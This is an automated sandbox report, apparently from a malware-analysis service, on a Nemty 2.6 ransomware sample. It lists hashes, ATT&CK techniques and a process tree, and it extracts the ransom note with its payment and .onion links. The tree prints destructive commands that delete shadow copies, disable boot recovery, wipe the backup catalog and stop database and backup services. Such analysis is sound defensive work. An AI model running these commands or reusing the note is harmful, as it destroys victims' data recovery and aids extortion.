nemty | 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3

General

Target

4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe
Size

87KB
MD5

c96613c857018555f3a5bc227567e6e7
SHA1

a402f5e46c8e056c9e9494f7e83902e0fcae3a61
SHA256

4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3
SHA512

086fa536e03882efe6eb79a6f56d954205e00c37885f5d23f8eae47702125d7fed2a8c76d6d2e01d6eeb175f273185844a6494847bef2f0f805560867f075c41

Score

10^/10

nemty ransomware

Malware Config

Extracted

Path

C:\NEMTY_YX2KTOA-DECRYPT.txt

Family

nemty

Ransom Note

---> NEMTY 2.6 REVENGE <--- Some (or maybe all) of your files got encryped. We provide decryption tool if you pay a ransom. Don't worry, if we can't help you with decrypting - other people won't trust us. We provide test decryption, as proof that we can decrypt your data. You have 3 month to pay (after visiting the ransom page) until decryption key will be deleted from server. After 3 month no one, even our service can't make decryptor. 1) Web-Browser a) Open your browser. b) Open this link: http://nemty.top/public/pay.php c) Upload this file. d) Follow the instructions. 2) Tor-Browser a) Download&Install Tor-Browser. b) Open Tor-Browser. c) Open this link: http://zjoxyw5mkacojk5ptn2iprkivg5clow72mjkyk5ttubzxprjjnwapkad.onion/public/pay.php d) Upload this file. e) Follow the instruction. <BEGIN NEMTY KEY> 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

URLs

http://nemty.top/public/pay.php

http://zjoxyw5mkacojk5ptn2iprkivg5clow72mjkyk5ttubzxprjjnwapkad.onion/public/pay.php

Signatures

Nemty
Ransomware discovered in late 2019 which has been actively developed/updated over time.
ransomware nemty
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies extensions of user files 8 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\CompressRepair.raw => C:\Users\Admin\Pictures\CompressRepair.raw.NEMTY_YX2KTOA	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe
File opened for modification	C:\Users\Admin\Pictures\InvokeSelect.tiff	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe
File renamed	C:\Users\Admin\Pictures\InvokeSelect.tiff => C:\Users\Admin\Pictures\InvokeSelect.tiff.NEMTY_YX2KTOA	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe
File renamed	C:\Users\Admin\Pictures\RestorePublish.png => C:\Users\Admin\Pictures\RestorePublish.png.NEMTY_YX2KTOA	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe
File renamed	C:\Users\Admin\Pictures\UnlockEnter.tif => C:\Users\Admin\Pictures\UnlockEnter.tif.NEMTY_YX2KTOA	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe
File renamed	C:\Users\Admin\Pictures\UnpublishEnter.png => C:\Users\Admin\Pictures\UnpublishEnter.png.NEMTY_YX2KTOA	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe
File renamed	C:\Users\Admin\Pictures\BlockDisable.tif => C:\Users\Admin\Pictures\BlockDisable.tif.NEMTY_YX2KTOA	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe
File renamed	C:\Users\Admin\Pictures\BlockUnpublish.raw => C:\Users\Admin\Pictures\BlockUnpublish.raw.NEMTY_YX2KTOA	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe

Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

4 api.ipify.org
6 api.db-ip.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exe

pid process

560 vssadmin.exe
1132 vssadmin.exe

flow	ioc
4	api.ipify.org
6	api.db-ip.com

pid	process
560	vssadmin.exe
1132	vssadmin.exe

Kills process with taskkill 14 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1616	taskkill.exe
584	taskkill.exe
1072	taskkill.exe
1296	taskkill.exe
976	taskkill.exe
1524	taskkill.exe
924	taskkill.exe
1844	taskkill.exe
1760	taskkill.exe
532	taskkill.exe
2008	taskkill.exe
1868	taskkill.exe
2000	taskkill.exe
1708	taskkill.exe

Runs net.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exepowershell.exe

pid process

1388 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe
1764 powershell.exe

pid	process
1388	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe
1764	powershell.exe

Suspicious use of AdjustPrivilegeToken 58 IoCs

Processes:

vssvc.exeWMIC.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exe

description	pid	process
Token: SeBackupPrivilege	1400	vssvc.exe
Token: SeRestorePrivilege	1400	vssvc.exe
Token: SeAuditPrivilege	1400	vssvc.exe
Token: SeIncreaseQuotaPrivilege	1716	WMIC.exe
Token: SeSecurityPrivilege	1716	WMIC.exe
Token: SeTakeOwnershipPrivilege	1716	WMIC.exe
Token: SeLoadDriverPrivilege	1716	WMIC.exe
Token: SeSystemProfilePrivilege	1716	WMIC.exe
Token: SeSystemtimePrivilege	1716	WMIC.exe
Token: SeProfSingleProcessPrivilege	1716	WMIC.exe
Token: SeIncBasePriorityPrivilege	1716	WMIC.exe
Token: SeCreatePagefilePrivilege	1716	WMIC.exe
Token: SeBackupPrivilege	1716	WMIC.exe
Token: SeRestorePrivilege	1716	WMIC.exe
Token: SeShutdownPrivilege	1716	WMIC.exe
Token: SeDebugPrivilege	1716	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1716	WMIC.exe
Token: SeRemoteShutdownPrivilege	1716	WMIC.exe
Token: SeUndockPrivilege	1716	WMIC.exe
Token: SeManageVolumePrivilege	1716	WMIC.exe
Token: 33	1716	WMIC.exe
Token: 34	1716	WMIC.exe
Token: 35	1716	WMIC.exe
Token: SeDebugPrivilege	1760	taskkill.exe
Token: SeIncreaseQuotaPrivilege	1716	WMIC.exe
Token: SeSecurityPrivilege	1716	WMIC.exe
Token: SeTakeOwnershipPrivilege	1716	WMIC.exe
Token: SeLoadDriverPrivilege	1716	WMIC.exe
Token: SeSystemProfilePrivilege	1716	WMIC.exe
Token: SeSystemtimePrivilege	1716	WMIC.exe
Token: SeProfSingleProcessPrivilege	1716	WMIC.exe
Token: SeIncBasePriorityPrivilege	1716	WMIC.exe
Token: SeCreatePagefilePrivilege	1716	WMIC.exe
Token: SeBackupPrivilege	1716	WMIC.exe
Token: SeRestorePrivilege	1716	WMIC.exe
Token: SeShutdownPrivilege	1716	WMIC.exe
Token: SeDebugPrivilege	1716	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1716	WMIC.exe
Token: SeRemoteShutdownPrivilege	1716	WMIC.exe
Token: SeUndockPrivilege	1716	WMIC.exe
Token: SeManageVolumePrivilege	1716	WMIC.exe
Token: 33	1716	WMIC.exe
Token: 34	1716	WMIC.exe
Token: 35	1716	WMIC.exe
Token: SeDebugPrivilege	532	taskkill.exe
Token: SeDebugPrivilege	2008	taskkill.exe
Token: SeDebugPrivilege	1616	taskkill.exe
Token: SeDebugPrivilege	1868	taskkill.exe
Token: SeDebugPrivilege	584	taskkill.exe
Token: SeDebugPrivilege	1524	taskkill.exe
Token: SeDebugPrivilege	2000	taskkill.exe
Token: SeDebugPrivilege	924	taskkill.exe
Token: SeDebugPrivilege	1072	taskkill.exe
Token: SeDebugPrivilege	1708	taskkill.exe
Token: SeDebugPrivilege	1296	taskkill.exe
Token: SeDebugPrivilege	976	taskkill.exe
Token: SeDebugPrivilege	1844	taskkill.exe
Token: SeDebugPrivilege	1764	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.execmd.execmd.execmd.execmd.execmd.exenet.exenet.exenet.exe

description	pid	process	target process
PID 1388 wrote to memory of 1668	1388	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	cmd.exe
PID 1388 wrote to memory of 1668	1388	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	cmd.exe
PID 1388 wrote to memory of 1668	1388	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	cmd.exe
PID 1388 wrote to memory of 1668	1388	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	cmd.exe
PID 1388 wrote to memory of 584	1388	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	cmd.exe
PID 1388 wrote to memory of 584	1388	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	cmd.exe
PID 1388 wrote to memory of 584	1388	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	cmd.exe
PID 1388 wrote to memory of 584	1388	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	cmd.exe
PID 584 wrote to memory of 560	584	cmd.exe	vssadmin.exe
PID 584 wrote to memory of 560	584	cmd.exe	vssadmin.exe
PID 584 wrote to memory of 560	584	cmd.exe	vssadmin.exe
PID 584 wrote to memory of 560	584	cmd.exe	vssadmin.exe
PID 1668 wrote to memory of 1132	1668	cmd.exe	vssadmin.exe
PID 1668 wrote to memory of 1132	1668	cmd.exe	vssadmin.exe
PID 1668 wrote to memory of 1132	1668	cmd.exe	vssadmin.exe
PID 1668 wrote to memory of 1132	1668	cmd.exe	vssadmin.exe
PID 1388 wrote to memory of 1312	1388	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	cmd.exe
PID 1388 wrote to memory of 1312	1388	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	cmd.exe
PID 1388 wrote to memory of 1312	1388	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	cmd.exe
PID 1388 wrote to memory of 1312	1388	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	cmd.exe
PID 1388 wrote to memory of 1552	1388	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	cmd.exe
PID 1388 wrote to memory of 1552	1388	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	cmd.exe
PID 1388 wrote to memory of 1552	1388	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	cmd.exe
PID 1388 wrote to memory of 1552	1388	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	cmd.exe
PID 1388 wrote to memory of 980	1388	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	cmd.exe
PID 1388 wrote to memory of 980	1388	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	cmd.exe
PID 1388 wrote to memory of 980	1388	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	cmd.exe
PID 1388 wrote to memory of 980	1388	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	cmd.exe
PID 1552 wrote to memory of 1708	1552	cmd.exe	net.exe
PID 1552 wrote to memory of 1708	1552	cmd.exe	net.exe
PID 1552 wrote to memory of 1708	1552	cmd.exe	net.exe
PID 1552 wrote to memory of 1708	1552	cmd.exe	net.exe
PID 1312 wrote to memory of 1760	1312	cmd.exe	taskkill.exe
PID 1312 wrote to memory of 1760	1312	cmd.exe	taskkill.exe
PID 1312 wrote to memory of 1760	1312	cmd.exe	taskkill.exe
PID 1312 wrote to memory of 1760	1312	cmd.exe	taskkill.exe
PID 1388 wrote to memory of 1764	1388	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	powershell.exe
PID 1388 wrote to memory of 1764	1388	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	powershell.exe
PID 1388 wrote to memory of 1764	1388	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	powershell.exe
PID 1388 wrote to memory of 1764	1388	4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe	powershell.exe
PID 980 wrote to memory of 1716	980	cmd.exe	WMIC.exe
PID 980 wrote to memory of 1716	980	cmd.exe	WMIC.exe
PID 980 wrote to memory of 1716	980	cmd.exe	WMIC.exe
PID 980 wrote to memory of 1716	980	cmd.exe	WMIC.exe
PID 1708 wrote to memory of 2008	1708	net.exe	net1.exe
PID 1708 wrote to memory of 2008	1708	net.exe	net1.exe
PID 1708 wrote to memory of 2008	1708	net.exe	net1.exe
PID 1708 wrote to memory of 2008	1708	net.exe	net1.exe
PID 1552 wrote to memory of 704	1552	cmd.exe	net.exe
PID 1552 wrote to memory of 704	1552	cmd.exe	net.exe
PID 1552 wrote to memory of 704	1552	cmd.exe	net.exe
PID 1552 wrote to memory of 704	1552	cmd.exe	net.exe
PID 704 wrote to memory of 1020	704	net.exe	net1.exe
PID 704 wrote to memory of 1020	704	net.exe	net1.exe
PID 704 wrote to memory of 1020	704	net.exe	net1.exe
PID 704 wrote to memory of 1020	704	net.exe	net1.exe
PID 1552 wrote to memory of 604	1552	cmd.exe	net.exe
PID 1552 wrote to memory of 604	1552	cmd.exe	net.exe
PID 1552 wrote to memory of 604	1552	cmd.exe	net.exe
PID 1552 wrote to memory of 604	1552	cmd.exe	net.exe
PID 604 wrote to memory of 1732	604	net.exe	net1.exe
PID 604 wrote to memory of 1732	604	net.exe	net1.exe
PID 604 wrote to memory of 1732	604	net.exe	net1.exe
PID 604 wrote to memory of 1732	604	net.exe	net1.exe

C:\Users\Admin\AppData\Local\Temp\4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe
"C:\Users\Admin\AppData\Local\Temp\4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe"
1⤵
- Modifies extensions of user files
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1388

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
2⤵
- Suspicious use of WriteProcessMemory
PID:1668

C:\Windows\SysWOW64\vssadmin.exe
vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
3⤵
- Interacts with shadow copies
PID:1132

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
2⤵
- Suspicious use of WriteProcessMemory
PID:584

C:\Windows\SysWOW64\vssadmin.exe
vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
3⤵
- Interacts with shadow copies
PID:560

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /f /im sql.* & taskkill /f /im winword.* & taskkill /f /im wordpad.* & taskkill /f /im outlook.* & taskkill /f /im thunderbird.* & taskkill /f /im oracle.* & taskkill /f /im excel.* & taskkill /f /im onenote.* & taskkill /f /im virtualboxvm.* & taskkill /f /im node.* & taskkill /f /im QBW32.* & taskkill /f /im WBGX.* & taskkill /f /im Teams.* & taskkill /f /im Flow.*
2⤵
- Suspicious use of WriteProcessMemory
PID:1312

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im sql.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1760

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im winword.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:532

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im wordpad.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2008

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im outlook.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1616

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im thunderbird.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1868

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im oracle.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:584

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im excel.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1524

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im onenote.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2000

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im virtualboxvm.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:924

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im node.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1072

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im QBW32.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1708

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im WBGX.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1296

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Teams.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:976

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Flow.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1844

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c net stop DbxSvc & net stop OracleXETNSListener & net stop OracleServiceXE & net stop AcrSch2Svc & net stop AcronisAgent & net stop Apache2.4 & net stop SQLWriter & net stop MSSQL$SQLEXPRESS & net stop MSSQLServerADHelper100 & net stop MongoDB & net stop SQLAgent$SQLEXPRESS & net stop SQLBrowser & net stop CobianBackup11 & net stop cbVSCService11 & net stop QBCFMontorService & net stop QBVSS
2⤵
- Suspicious use of WriteProcessMemory
PID:1552

C:\Windows\SysWOW64\net.exe
net stop DbxSvc
3⤵
- Suspicious use of WriteProcessMemory
PID:1708

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DbxSvc
4⤵
PID:2008

C:\Windows\SysWOW64\net.exe
net stop OracleXETNSListener
3⤵
- Suspicious use of WriteProcessMemory
PID:704

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop OracleXETNSListener
4⤵
PID:1020

C:\Windows\SysWOW64\net.exe
net stop OracleServiceXE
3⤵
- Suspicious use of WriteProcessMemory
PID:604

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop OracleServiceXE
4⤵
PID:1732

C:\Windows\SysWOW64\net.exe
net stop AcrSch2Svc
3⤵
PID:1576

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc
4⤵
PID:1824

C:\Windows\SysWOW64\net.exe
net stop AcronisAgent
3⤵
PID:1624

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent
4⤵
PID:1724

C:\Windows\SysWOW64\net.exe
net stop Apache2.4
3⤵
PID:1648

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Apache2.4
4⤵
PID:520

C:\Windows\SysWOW64\net.exe
net stop SQLWriter
3⤵
PID:868

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLWriter
4⤵
PID:1868

C:\Windows\SysWOW64\net.exe
net stop MSSQL$SQLEXPRESS
3⤵
PID:1808

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS
4⤵
PID:1512

C:\Windows\SysWOW64\net.exe
net stop MSSQLServerADHelper100
3⤵
PID:1516

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100
4⤵
PID:1520

C:\Windows\SysWOW64\net.exe
net stop MongoDB
3⤵
PID:1532

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MongoDB
4⤵
PID:668

C:\Windows\SysWOW64\net.exe
net stop SQLAgent$SQLEXPRESS
3⤵
PID:1364

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS
4⤵
PID:1668

C:\Windows\SysWOW64\net.exe
net stop SQLBrowser
3⤵
PID:572

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLBrowser
4⤵
PID:1148

C:\Windows\SysWOW64\net.exe
net stop CobianBackup11
3⤵
PID:972

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CobianBackup11
4⤵
PID:1812

C:\Windows\SysWOW64\net.exe
net stop cbVSCService11
3⤵
PID:1072

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop cbVSCService11
4⤵
PID:1076

C:\Windows\SysWOW64\net.exe
net stop QBCFMontorService
3⤵
PID:1728

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBCFMontorService
4⤵
PID:1732

C:\Windows\SysWOW64\net.exe
net stop QBVSS
3⤵
PID:1296

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBVSS
4⤵
PID:1624

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wmic shadowcopy delete
2⤵
- Suspicious use of WriteProcessMemory
PID:980

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1716

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1764

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\NEMTY_YX2KTOA-DECRYPT.txt"
2⤵
PID:2000

C:\Windows\SysWOW64\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\NEMTY_YX2KTOA-DECRYPT.txt
3⤵
PID:1728

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1400

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File Deletion

2

T1107

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

2

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\NEMTY_YX2KTOA-DECRYPT.txt
MD5
b53382d266be823202fe3b7a7edc1d3b

SHA1
7017a065a772711d21c0bbb4b1c5c8f464768e53

SHA256
ff5dd9106b57ead90860c15083585c5925cb16865c5038d60dd5a9d89e1ba384

SHA512
